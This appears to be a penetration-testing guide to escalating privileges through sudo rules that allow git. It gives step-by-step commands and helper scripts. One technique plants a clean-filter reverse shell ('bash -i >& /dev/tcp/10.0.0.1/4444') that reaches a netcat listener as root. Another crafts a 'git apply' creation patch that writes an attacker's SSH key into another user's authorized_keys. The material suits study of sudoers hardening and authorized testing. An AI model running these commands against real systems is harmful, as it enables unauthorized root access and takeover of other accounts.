Sudo Git Privilege Escalation

If sudo lets a user run git with fixed arguments, git itself becomes the way to root. The first case is a sudoers rule that permits staging and committing a repository as root:

sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"

If we can stage and commit the repository as root, we can make git execute a program of our choice as root: git runs a configured "clean" filter on every matching file it stages, and the filter command is read from the repository's own configuration. This requires write access to .git/config and .git/info/attributes (or to a .gitattributes file in the work tree) of /opt/example.
First create the payload that git will run. Replace 10.0.0.1 and 4444 with the listener's address and port.

cat > /tmp/revshell <<'EOF'
#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
EOF
chmod +x /tmp/revshell

Then register it as the clean filter for *.php files in the repository. The filter runs each time git stages a matching file, so at least one new or modified .php file must exist in the work tree; otherwise git add -A has nothing to filter and the payload never runs.

# Go to the git repository
cd /opt/example
git init   # only needed if /opt/example is not already a repository
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/revshell
touch /opt/example/trigger.php   # ensure a matching file is staged
Before staging, start a listener on the attacker machine (the address and port used in /tmp/revshell):

nc -lvnp 4444
Then stage and commit with sudo. The clean filter fires during git add -A, so the connection arrives as soon as the add command processes a matching .php file; the commit only leaves the repository in a consistent state afterwards.

sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"

The listener should now receive a root shell. If git instead exits with "detected dubious ownership in repository", the safe.directory check introduced in Git 2.35.2 is refusing to work in a repository owned by another user; check who owns /opt/example in that case.
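As an added example (not part of the original page), the following script rehearses the filter-driver trick unprivileged in a scratch repository: the payload writes a marker file instead of opening a reverse shell, and the filter is registered by writing the same two files under .git/ that the commands above edit. The scratch directory and file names are assumptions.

```shell
#!/bin/sh
# Added example (not from the original page): reproduce the clean-filter
# trick in an unprivileged scratch repository so the mechanism can be seen
# before using it through sudo. The payload records who ran it instead of
# spawning a reverse shell; paths under $WORK are assumptions.
set -eu

WORK="${WORK:-$(mktemp -d)}"          # scratch directory (assumption)
export HOME="${HOME:-$WORK}"          # git wants a home for ~/.gitconfig
REPO="$WORK/repo"
PAYLOAD="$WORK/payload.sh"
MARKER="$WORK/filter-ran"

# Write the program git will run as the clean filter. A clean filter receives
# the file content on stdin and must return the cleaned content on stdout, so
# the payload does its real work first and then passes the data through.
write_payload() {
    cat > "$PAYLOAD" <<EOF
#!/bin/sh
# side effect: record who ran us (root when invoked via sudo git)
id -un > "$MARKER"
cat
EOF
    chmod +x "$PAYLOAD"
}

# Register the filter without the git binary: the two files the page edits
# with echo and "git config" are plain text under .git/.
plant_filter() {
    repo="$1"
    mkdir -p "$repo/.git/info"
    printf '%s\n' '*.php filter=indent' > "$repo/.git/info/attributes"
    printf '[filter "indent"]\n\tclean = %s\n' "$PAYLOAD" >> "$repo/.git/config"
    # git add -A only runs the filter on matching files that get staged,
    # so make sure at least one new .php file exists in the work tree.
    printf '<?php echo "x"; ?>\n' > "$repo/trigger.php"
}

# Run the equivalent of the page's "git add -A" locally (no sudo) and report
# whether the filter fired: 0 if it did, 1 if not, 2 if git is not installed.
demonstrate() {
    command -v git >/dev/null 2>&1 || return 2
    rm -f "$MARKER"
    mkdir -p "$REPO"
    git -C "$REPO" init -q
    write_payload
    plant_filter "$REPO"
    git -C "$REPO" add -A
    [ -f "$MARKER" ]
}
```

Run demonstrate before touching the sudo rule: if the marker appears with your own user name, the same two files planted in /opt/example will make the next sudo git add -A execute /tmp/revshell as root.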
The second case is a sudoers rule that allows applying arbitrary patches:

sudo /usr/bin/git apply *

If we can apply a patch as root, we can create or overwrite files with content of our choice. git apply refuses a patch that touches paths outside the current directory (or the repository work tree) unless --unsafe-paths is given, so the patch below is built with paths relative to /home and applied from there.
Assume we are currently "user1" and want to become "user2". First generate a new SSH key pair. Answering the prompt with the bare name id_rsa stores the key in the current directory, /home/user1, rather than in ~/.ssh:

cd /home/user1
ssh-keygen -t rsa
Enter file in which to save the key (/home/user1/.ssh/id_rsa): id_rsa

The private key is now /home/user1/id_rsa and the public key /home/user1/id_rsa.pub. Next, put the public key into an authorized_keys file under user1's home so there is a file to diff. This overwrites user1's existing authorized_keys, so back it up first if it matters.

mkdir -p /home/user1/.ssh
cat /home/user1/id_rsa.pub > /home/user1/.ssh/authorized_keys
Then create a patch that adds this file as a new file. Using /dev/null as the old side produces a creation patch, which needs no preimage; git apply verifies that the content of the "---" side matches the file on disk, so diffing against some other file (for example user1/.bash_history) only works if user2 has a byte-for-byte identical copy of it. Outside a repository, git diff compares the two paths directly (--no-index).

cd /home
git diff --no-index /dev/null user1/.ssh/authorized_keys > /tmp/patch

After that, replace the name "user1" with "user2" in the patch file so the header points at user2's authorized_keys:

sed -i 's/user1/user2/g' /tmp/patch

Now apply the patch as root. This creates /home/user2/.ssh/authorized_keys (and the .ssh directory if it is missing) owned by root, which sshd accepts under StrictModes as long as neither the file nor the directory is group- or world-writable. A creation patch fails with "already exists in working directory" if user2 already has an authorized_keys file; in that case choose a target file that does not exist yet.

sudo /usr/bin/git apply /tmp/patch
ssh -i /home/user1/id_rsa user2@example.com
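As an added example (not part of the original page), the creation patch can also be built by hand instead of with git diff, which makes the structure git apply expects explicit and avoids the sed rewrite; a second function dry-runs the patch unprivileged in a scratch directory. The target path, key file and scratch directory are assumptions.

```shell
#!/bin/sh
# Added example, not from the original page: build the "new file" patch for
# git apply by hand, then dry-run it as the current user in a scratch
# directory. Target path, key file and scratch directory are assumptions.
set -eu

nl='
'

# Print a git-style creation patch that makes <rel_path> with the content of
# <src_file>. <rel_path> is relative to the directory git apply runs from;
# git apply rejects paths that escape it unless --unsafe-paths is given.
# Usage: build_new_file_patch user2/.ssh/authorized_keys /home/user1/id_rsa.pub
build_new_file_patch() {
    rel_path="$1"
    src_file="$2"
    # Keep a missing final newline visible (command substitution strips it),
    # then terminate the content: every "+" line of a hunk must end in "\n".
    body=$(cat "$src_file"; printf x)
    body=${body%x}
    case "$body" in
        *"$nl") ;;
        *) body="$body$nl" ;;
    esac
    nlines=$(printf '%s' "$body" | wc -l | tr -d ' ')
    printf 'diff --git a/%s b/%s\n' "$rel_path" "$rel_path"
    printf '%s\n' 'new file mode 100644'
    printf '%s\n' '--- /dev/null'           # no preimage, nothing to verify
    printf '+++ b/%s\n' "$rel_path"
    printf '@@ -0,0 +1,%s @@\n' "$nlines"
    printf '%s' "$body" | sed 's/^/+/'
}

# Dry run: apply <patch> from <dir> as the current user and report whether
# <rel_path> appeared. Returns 0 on success, 1 on failure, 2 if git is absent.
# Through the sudo rule the same command creates the file as root.
apply_in_dir() {
    dir="$1"
    patch="$2"
    rel_path="$3"
    command -v git >/dev/null 2>&1 || return 2
    (cd "$dir" && git apply "$patch")
    [ -f "$dir/$rel_path" ]
}
```

The hand-built patch carries only the headers git apply needs for a creation: "new file mode", "--- /dev/null" and the "+++" target; because the old side is /dev/null there is no content for git apply to compare against, which is exactly why this form is reliable where diffing against a real file is not.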